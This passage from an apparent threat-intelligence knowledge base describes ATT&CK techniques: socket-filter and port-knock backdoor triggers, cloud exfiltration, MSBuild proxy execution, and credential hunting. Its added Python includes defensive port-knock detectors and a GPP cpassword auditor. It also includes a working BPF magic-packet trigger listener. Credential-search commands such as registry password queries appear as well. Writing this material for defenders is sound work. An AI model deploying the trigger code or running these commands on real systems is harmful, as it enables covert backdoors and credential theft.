This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r <sup>[[Hartrell cd00r 2002](https://app.tidalcyber.com/references/739e6517-10f5-484d-8000-8818d63e7341)]</sup>, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

The tag is: misp-galaxy:technique="Port Knocking"

Socket Filters

Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the libpcap library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.

To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.<sup>[[haking9 libpcap network sniffing](https://app.tidalcyber.com/references/2803d0b8-78ee-4b19-aad3-daf84cd292b5)]</sup> Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with Protocol Tunneling.<sup>[[exatrack bpf filters passive backdoors](https://app.tidalcyber.com/references/84ffd130-97b9-4bbf-bc3e-42accdf248ce)]</sup><sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>

Filters can be installed on any Unix-like platform with libpcap installed or on Windows hosts using WinPcap. Adversaries may use either libpcap with <code>pcap_setfilter</code> or the standard library function <code>setsockopt</code> with the <code>SO_ATTACH_FILTER</code> option. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.
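What <code>setsockopt(SO_ATTACH_FILTER)</code> actually installs is a small classic-BPF program that the kernel runs against every frame before anything reaches user space. The following is an added example (not code from the galaxy or the reports it cites) that builds such a program to match IPv4/UDP frames whose first four payload bytes equal a magic value, encodes it as the <code>sock_filter</code> array the kernel expects, and attaches it to an AF_PACKET socket on Linux. A small interpreter for the instruction subset used lets the program be checked offline against constructed frames; the opcode values are from <code>linux/filter.h</code>, while <code>MAGIC</code> and the interface name are assumptions for the example.

```python
"""Build and attach a classic BPF socket filter that wakes only on a magic payload.

Added example, not code from the galaxy or the reports it cites. The program
accepts IPv4/UDP frames whose first four payload bytes equal MAGIC and drops
everything else; attach_filter() installs it with setsockopt(SO_ATTACH_FILTER)
on an AF_PACKET socket (Linux, needs CAP_NET_RAW). bpf_matches() interprets the
instruction subset used here so the program can be checked offline against the
constructed frames from build_frame(). Opcodes are from linux/filter.h; MAGIC
and the interface name are assumptions for the example.
"""
import socket
import struct

MAGIC = b"\xde\xad\xbe\xef"
SO_ATTACH_FILTER = 26

# classic BPF opcodes: class | size | mode
LD_W_ABS = 0x20   # BPF_LD  | BPF_W | BPF_ABS
LD_H_ABS = 0x28   # BPF_LD  | BPF_H | BPF_ABS
LD_B_ABS = 0x30   # BPF_LD  | BPF_B | BPF_ABS
LD_W_IND = 0x40   # BPF_LD  | BPF_W | BPF_IND   A = P[X + k]
LDX_MSH = 0xB1    # BPF_LDX | BPF_B | BPF_MSH   X = 4 * (P[k] & 0xF)
JEQ_K = 0x15      # BPF_JMP | BPF_JEQ | BPF_K
RET_K = 0x06      # BPF_RET | BPF_K


def magic_udp_filter(magic: bytes = MAGIC):
    """Instructions as (code, jt, jf, k); jumps are relative to the next instruction."""
    want = struct.unpack("!I", magic)[0]
    return [
        (LD_H_ABS, 0, 0, 12),       # 0: A = EtherType
        (JEQ_K, 0, 6, 0x0800),      # 1: IPv4? otherwise -> 8 (drop)
        (LD_B_ABS, 0, 0, 23),       # 2: A = IP protocol
        (JEQ_K, 0, 4, 17),          # 3: UDP? otherwise -> 8
        (LDX_MSH, 0, 0, 14),        # 4: X = IHL * 4
        (LD_W_IND, 0, 0, 22),       # 5: A = payload[0:4] (14 eth + X ip + 8 udp)
        (JEQ_K, 0, 1, want),        # 6: A == MAGIC ? -> 7 : -> 8
        (RET_K, 0, 0, 0xFFFFFFFF),  # 7: accept the whole frame
        (RET_K, 0, 0, 0),           # 8: drop
    ]


def encode_program(prog) -> bytes:
    """struct sock_filter[]: u16 code, u8 jt, u8 jf, u32 k."""
    return b"".join(struct.pack("HBBI", *ins) for ins in prog)


def attach_filter(sock, prog):
    """setsockopt(SOL_SOCKET, SO_ATTACH_FILTER, struct sock_fprog{len, *filter})."""
    import ctypes
    raw = ctypes.create_string_buffer(encode_program(prog), len(prog) * 8)
    fprog = struct.pack("HL", len(prog), ctypes.addressof(raw))  # native layout, padded
    sock.setsockopt(socket.SOL_SOCKET, SO_ATTACH_FILTER, fprog)
    return raw  # the kernel copies the program during the call


def bpf_matches(prog, pkt: bytes) -> int:
    """Offline interpreter for the opcodes above; returns the RET value (0 = drop)."""
    a = x = pc = 0
    while pc < len(prog):
        code, jt, jf, k = prog[pc]
        pc += 1
        if code in (LD_W_ABS, LD_H_ABS, LD_B_ABS, LD_W_IND, LDX_MSH):
            off = k + (x if code == LD_W_IND else 0)
            width = {LD_W_ABS: 4, LD_W_IND: 4, LD_H_ABS: 2}.get(code, 1)
            if off + width > len(pkt):
                return 0            # the kernel rejects out-of-bounds loads
            val = int.from_bytes(pkt[off:off + width], "big")
            if code == LDX_MSH:
                x = 4 * (val & 0xF)
            else:
                a = val
        elif code == JEQ_K:
            pc += jt if a == k else jf
        elif code == RET_K:
            return k
        else:
            raise ValueError(f"unsupported opcode {code:#x}")
    raise ValueError("program fell off the end")


def build_frame(proto: int, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4 frame (IHL=5, checksums zeroed; the filter ignores them)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    l4 = struct.pack("!HHHH", 40000, 53, 8 + len(payload), 0) if proto == 17 else b""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4) + len(payload), 0, 0, 64,
                     proto, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return eth + ip + l4 + payload


def wait_for_trigger(iface: str = "eth0") -> bytes:
    """Block until a frame carrying MAGIC arrives; nothing else reaches user space."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
    s.bind((iface, 0))
    _keep = attach_filter(s, magic_udp_filter())
    try:
        return s.recv(65535)
    finally:
        s.close()
```

The socket in <code>wait_for_trigger()</code> is bound to ETH_P_ALL but never produces a listening port, a connection, or any traffic of its own, which is exactly the visibility gap the paragraph above describes; on the defensive side, <code>/proc/net/packet</code> and <code>ss -0</code> (the AF_PACKET family) are where such sockets do show up.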

The tag is: misp-galaxy:technique="Socket Filters"

Traffic Signaling

Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://app.tidalcyber.com/technique/34a112db-c61d-4ea2-872f-de3fc1af87a3)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.

Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r <sup>[[Hartrell cd00r 2002](https://app.tidalcyber.com/references/739e6517-10f5-484d-8000-8818d63e7341)]</sup>, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
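Both the Port Knocking entry and the paragraph above describe the same observable: a run of attempts against closed ports, in a fixed order and within a short time, followed by a connection to a port that was not reachable before. The following is an added example (not code from the galaxy or the cd00r paper it cites) that replays constructed firewall-style records and reports sources completing such a sequence. The record layout, the <code>KNOCK</code> sequence and the <code>WINDOW</code> are assumptions for the example, and <code>SAMPLE</code> is constructed data.

```python
"""Detect a completed port-knock sequence in connection logs.

Added example, not code from the galaxy or the cd00r paper it cites. It replays
firewall-style records (time, source, destination, destination port, action),
tracks per source/destination pair how far through an ordered sequence of
closed ports the source has got, and reports pairs that complete the sequence
inside a time window together with the port that then accepted a connection.
The record layout, KNOCK and WINDOW are assumptions; SAMPLE is constructed.
"""

KNOCK = (7000, 8000, 9000)   # the knock sequence to look for
WINDOW = 10.0                # seconds allowed between first knock and the opened port

# constructed records: (t, src, dst, dport, action)
SAMPLE = [
    (100.0, "203.0.113.5", "10.0.0.7", 7000, "DROP"),
    (100.4, "203.0.113.5", "10.0.0.7", 8000, "DROP"),
    (100.9, "203.0.113.5", "10.0.0.7", 9000, "DROP"),
    (101.5, "203.0.113.5", "10.0.0.7", 4444, "ACCEPT"),   # a port that was closed is now open
    (200.0, "198.51.100.9", "10.0.0.7", 7000, "DROP"),      # same ports, but too slow
    (230.0, "198.51.100.9", "10.0.0.7", 8000, "DROP"),
    (231.0, "198.51.100.9", "10.0.0.7", 9000, "DROP"),
    (300.0, "192.0.2.44", "10.0.0.7", 22, "ACCEPT"),        # ordinary SSH, no knock
]


def find_knocks(records, knock=KNOCK, window=WINDOW):
    """Return one finding per completed knock; 'opened' is None if nothing followed."""
    progress = {}   # (src, dst) -> (next index into knock, time of first knock)
    armed = {}      # (src, dst) -> (t_first, t_last) once the sequence completed
    findings = []

    def report(key, t0, t1, opened):
        findings.append({"src": key[0], "dst": key[1], "knock_start": t0,
                         "knock_end": t1, "opened": opened})

    for t, src, dst, dport, action in sorted(records):
        key = (src, dst)
        if key in armed:
            t0, t1 = armed[key]
            if action == "ACCEPT" and t - t1 <= window:
                armed.pop(key)
                report(key, t0, t1, dport)      # knock followed by a newly open port
                continue
            if t - t1 > window:
                armed.pop(key)
                report(key, t0, t1, None)       # knock completed, nothing opened in time
            else:
                continue                        # still inside the window, keep waiting
        if action != "DROP":
            continue                            # knocks are attempts on closed ports
        idx, t0 = progress.get(key, (0, t))
        if t - t0 > window:
            idx, t0 = 0, t                      # too slow: restart the sequence
        if dport == knock[idx]:
            if idx == 0:
                t0 = t
            idx += 1
        elif dport == knock[0]:
            idx, t0 = 1, t                      # wrong port, but a fresh first knock
        else:
            idx = 0
        if idx == len(knock):
            armed[key] = (t0, t)
            progress.pop(key, None)
        else:
            progress[key] = (idx, t0)

    for key, (t0, t1) in armed.items():
        report(key, t0, t1, None)
    return findings
```

This only works where drops are logged (for example an iptables LOG rule ahead of the final DROP, or NetFlow with rejected flows), and the sequence is fixed here for illustration; when the sequence is unknown, the same state machine can be run over the distinct ports a source hits in order, flagging any source whose run of drops is followed by an accepted connection to a previously refused port.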

On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://app.tidalcyber.com/technique/195aa08b-15fd-4019-b905-8f31bc5e2094) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup><sup>[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup> To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) due to the monolithic nature of the architecture.

Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.<sup>[[Bleeping Computer - Ryuk WoL](https://app.tidalcyber.com/references/f6670b73-4d57-4aad-8264-1d42d585e280)]</sup><sup>[[AMD Magic Packet](https://app.tidalcyber.com/references/06d36dea-e13d-48c4-b6d6-0c175c379f5b)]</sup>
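A defender-side check for the closed-port knock pattern described in this entry, added here as an example (it is not part of the MISP galaxy text or of the cited references): it parses constructed firewall DROP/ACCEPT lines and flags a source that probes a few closed ports and is then accepted on a different port within a short window. The log format, addresses and thresholds are assumptions.

```python
"""Flag port-knock-like sequences in firewall logs.

Added example, not taken from the MISP galaxy or ATT&CK text. The log format
below is an iptables-like DROP/ACCEPT line; addresses, ports and thresholds
are constructed for the demonstration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real traffic). The first source knocks on three
# closed ports and is then accepted on 22; the second only hits a closed port;
# the third is an ordinary user with a single failed attempt before success.
SAMPLE_LOG = """\
2024-01-10T12:00:01 DROP SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP DPT=7000 FLAGS=SYN
2024-01-10T12:00:02 DROP SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP DPT=8000 FLAGS=SYN
2024-01-10T12:00:03 DROP SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP DPT=9000 FLAGS=SYN
2024-01-10T12:00:04 ACCEPT SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP DPT=22 FLAGS=SYN
2024-01-10T12:05:00 DROP SRC=198.51.100.4 DST=192.0.2.10 PROTO=TCP DPT=445 FLAGS=SYN
2024-01-10T12:05:30 DROP SRC=198.51.100.4 DST=192.0.2.10 PROTO=TCP DPT=445 FLAGS=SYN
2024-01-10T12:10:00 DROP SRC=192.0.2.55 DST=192.0.2.10 PROTO=TCP DPT=23 FLAGS=SYN
2024-01-10T12:10:02 ACCEPT SRC=192.0.2.55 DST=192.0.2.10 PROTO=TCP DPT=22 FLAGS=SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>DROP|ACCEPT) SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r"PROTO=(?P<proto>\S+) DPT=(?P<dpt>\d+)"
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    ev["dpt"] = int(ev["dpt"])
    return ev


def find_knock_sequences(log_text, window_s=30, min_knocks=3, max_knocks=8):
    """Return one finding per ACCEPT that follows a knock-like DROP sequence.

    Heuristic: within `window_s` seconds before an accepted connection, the
    same source was dropped on between `min_knocks` and `max_knocks` distinct
    ports, and the accepted port is not one of them. Wide scans exceed
    `max_knocks` and are left to scan detection; tune both limits per site.
    """
    events = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            events[(ev["src"], ev["dst"])].append(ev)

    findings = []
    for (src, dst), evs in events.items():
        evs.sort(key=lambda e: e["ts"])
        for i, ev in enumerate(evs):
            if ev["action"] != "ACCEPT":
                continue
            start = ev["ts"] - timedelta(seconds=window_s)
            ports = []  # distinct dropped ports, in order of first appearance
            for prev in evs[:i]:
                if prev["action"] == "DROP" and prev["ts"] >= start:
                    if prev["dpt"] not in ports:
                        ports.append(prev["dpt"])
            if min_knocks <= len(ports) <= max_knocks and ev["dpt"] not in ports:
                findings.append({
                    "src": src,
                    "dst": dst,
                    "knock_ports": ports,
                    "opened_port": ev["dpt"],
                    "time": ev["ts"].isoformat(),
                })
    return findings


if __name__ == "__main__":
    for finding in find_knock_sequences(SAMPLE_LOG):
        print(finding)
```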

The tag is: misp-galaxy:technique="Traffic Signaling"

Transfer Data to Cloud Account

Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.

A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.

Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.<sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup>

The tag is: misp-galaxy:technique="Transfer Data to Cloud Account"

MSBuild

Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.<sup>[[MSDN MSBuild](https://app.tidalcyber.com/references/9ad54187-84b0-47f9-af6e-c3753452e470)]</sup>

Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.<sup>[[MSDN MSBuild](https://app.tidalcyber.com/references/9ad54187-84b0-47f9-af6e-c3753452e470)]</sup><sup>[[Microsoft MSBuild Inline Tasks 2017](https://app.tidalcyber.com/references/2c638ca5-c7e2-4c4e-bb9c-e36d14899ca8)]</sup> MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.<sup>[[LOLBAS Msbuild](https://app.tidalcyber.com/references/de8e0741-255b-4c41-ba50-248ac5acc325)]</sup>

The tag is: misp-galaxy:technique="MSBuild"

Trusted Developer Utilities Proxy Execution

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.<sup>[[engima0x3 DNX Bypass](https://app.tidalcyber.com/references/e0186f1d-100d-4e52-b6f7-0a7e1c1a35f0)]</sup><sup>[[engima0x3 RCSI Bypass](https://app.tidalcyber.com/references/0b815bd9-6c7f-4bd8-9031-667fa6252f89)]</sup><sup>[[Exploit Monday WinDbg](https://app.tidalcyber.com/references/abd5f871-e12e-4355-af72-d4be79cb0291)]</sup><sup>[[LOLBAS Tracker](https://app.tidalcyber.com/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]</sup> These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.

The tag is: misp-galaxy:technique="Trusted Developer Utilities Proxy Execution"

Trusted Relationship

Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.

Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider’s access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) used by the other party for access to internal network systems may be compromised and used.<sup>[[CISA IT Service Providers](https://app.tidalcyber.com/references/b8bee7f9-155e-4765-9492-01182e4435b7)]</sup>

In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.<sup>[[Office 365 Delegated Administration](https://app.tidalcyber.com/references/fa0ed0fd-bf57-4a0f-9370-e22f27b20e42)]</sup>

The tag is: misp-galaxy:technique="Trusted Relationship"

Bash History

Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. <sup>[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)]</sup>

The tag is: misp-galaxy:technique="Bash History"

Chat Messages

Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.

Rather than accessing the stored chat logs (i.e., [Credentials In Files](https://app.tidalcyber.com/technique/838c5038-91e7-4648-925e-a142c8c10853)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation <sup>[[Slack Security Risks](https://app.tidalcyber.com/references/4332430a-0dec-5942-88ce-21f6d02cc9a9)]</sup>.

The tag is: misp-galaxy:technique="Chat Messages"

Cloud Instance Metadata API

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.<sup>[[AWS Instance Metadata API](https://app.tidalcyber.com/references/54a17f92-d73d-469f-87b3-34fb633bd9ed)]</sup> A cloud metadata API has been used in at least one high profile compromise.<sup>[[Krebs Capital One August 2019](https://app.tidalcyber.com/references/7d917231-735c-40d8-806d-7fee60d2f996)]</sup>

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.<sup>[[RedLock Instance Metadata API 2018](https://app.tidalcyber.com/references/f85fa206-d5bf-41fc-a521-01ad6281bee7)]</sup>

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.

The tag is: misp-galaxy:technique="Cloud Instance Metadata API"

Container API

Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.<sup>[[Docker API](https://app.tidalcyber.com/references/b8ec1e37-7286-40e8-9577-ff9c54801086)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup>

An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.<sup>[[Unit 42 Unsecured Docker Daemons](https://app.tidalcyber.com/references/efcbbbdd-9af1-46c2-8538-3fd22f2b67d2)]</sup> An adversary with sufficient permissions, such as via a pod’s service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.

The tag is: misp-galaxy:technique="Container API"

Credentials In Files

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). <sup>[[CG 2014](https://app.tidalcyber.com/references/46836549-f7e9-45e1-8d89-4d25ba26dbd7)]</sup> Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. <sup>[[SRD GPP](https://app.tidalcyber.com/references/a15fff18-5d3f-4898-9e47-ec6ae7dda749)]</sup>

In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.<sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup> They may also be found as parameters to deployment commands in container logs.<sup>[[Unit 42 Unsecured Docker Daemons](https://app.tidalcyber.com/references/efcbbbdd-9af1-46c2-8538-3fd22f2b67d2)]</sup> In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.<sup>[[Specter Ops - Cloud Credential Storage](https://app.tidalcyber.com/references/95d6d1ce-ceba-48ee-88c4-0fb30058bd80)]</sup>

The tag is: misp-galaxy:technique="Credentials In Files"

Credentials in Registry

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: <sup>[[Pentestlab Stored Credentials](https://app.tidalcyber.com/references/5be9afb8-749e-45a2-8e86-b5e6dc167b41)]</sup>

  • Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>

  • Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>

The tag is: misp-galaxy:technique="Credentials in Registry"

Group Policy Preferences

Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.<sup>[[Microsoft GPP 2016](https://app.tidalcyber.com/references/fa3beaf1-81e7-411b-849a-24cffaf7c552)]</sup>

These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).<sup>[[Microsoft GPP Key](https://app.tidalcyber.com/references/24d8847b-d5de-4513-a55f-62c805dfa1dc)]</sup>

The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:

On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: <code>dir /s * .xml</code>
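An administrator's audit for the condition this entry describes, added here as an example (it is not part of the MISP galaxy text and is not one of the tools the entry refers to): it walks a SYSVOL-like tree, parses each XML preference file and reports every element carrying a `cpassword` attribute so the offending policy can be removed. The directory layout, GUID placeholders and XML content are constructed.

```python
"""Audit a SYSVOL-like tree for Group Policy Preference items with cpassword.

Added example; not from the MISP galaxy text. Paths, GUIDs and XML content
below are constructed placeholders, not real policy data.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed Groups.xml-style preference item with an embedded credential.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2020-01-01 00:00:00">
    <Properties action="U" userName="LocalAdmin" acctDisabled="0"
                cpassword="CONSTRUCTED-PLACEHOLDER-VALUE"/>
  </User>
</Groups>
"""

# Constructed item that manages an account without storing a password.
SAMPLE_CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Helpdesk">
    <Properties action="U" userName="Helpdesk" acctDisabled="0"/>
  </User>
</Groups>
"""


def cpassword_elements(xml_path):
    """Yield every element in the file that carries a cpassword attribute."""
    try:
        root = ET.parse(xml_path).getroot()
    except ET.ParseError:
        return  # unparsable file; a real audit would log this separately
    for elem in root.iter():
        if "cpassword" in elem.attrib:
            yield elem


def audit_sysvol(root_dir):
    """Return one finding per cpassword attribute found under root_dir."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            for elem in cpassword_elements(path):
                findings.append({
                    "file": os.path.relpath(path, root_dir),
                    "element": elem.tag,
                    # Groups.xml uses userName; other preference types differ
                    "account": elem.attrib.get("userName", ""),
                    # an empty cpassword means no password is actually stored
                    "empty": elem.attrib["cpassword"] == "",
                })
    return findings


def build_sample_tree():
    """Create a temporary SYSVOL-like layout from the constructed XML above."""
    base = tempfile.mkdtemp(prefix="sysvol_demo_")
    layout = {
        ("Policies", "{GUID-PLACEHOLDER-1}", "Machine", "Preferences",
         "Groups", "Groups.xml"): SAMPLE_GROUPS_XML,
        ("Policies", "{GUID-PLACEHOLDER-2}", "User", "Preferences",
         "Groups", "Groups.xml"): SAMPLE_CLEAN_XML,
        ("Policies", "{GUID-PLACEHOLDER-2}", "GPT.INI"): "[General]\nVersion=1\n",
    }
    for parts, content in layout.items():
        path = os.path.join(base, *parts)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return base


if __name__ == "__main__":
    for finding in audit_sysvol(build_sample_tree()):
        print(finding)
```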

The tag is: misp-galaxy:technique="Group Policy Preferences"

Private Keys

Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.<sup>[[Wikipedia Public Key Crypto](https://app.tidalcyber.com/references/1b7514e7-477d-44a2-acee-d1819066dee4)]</sup> Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc.

Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on *nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.<sup>[[Kaspersky Careto](https://app.tidalcyber.com/references/547f1a4a-7e4a-461d-8c19-f4775cd60ac0)]</sup><sup>[[Palo Alto Prince of Persia](https://app.tidalcyber.com/references/e08bfc40-a580-4fa3-9531-d5e1bede374e)]</sup>

When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.<sup>[[Microsoft Primary Refresh Token](https://app.tidalcyber.com/references/d23bf6dc-979b-5f34-86a7-637979a5f20e)]</sup> An adversary with access to the device may be able to export the keys in order to impersonate the device.<sup>[[AADInternals Azure AD Device Identities](https://app.tidalcyber.com/references/b5ef16c4-1db0-51e9-93ab-54a8e480debc)]</sup>

On network devices, private keys may be exported via [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as crypto pki export.<sup>[[cisco_deploy_rsa_keys](https://app.tidalcyber.com/references/132f387e-4ee3-51d3-a3b6-d61102ada152)]</sup>

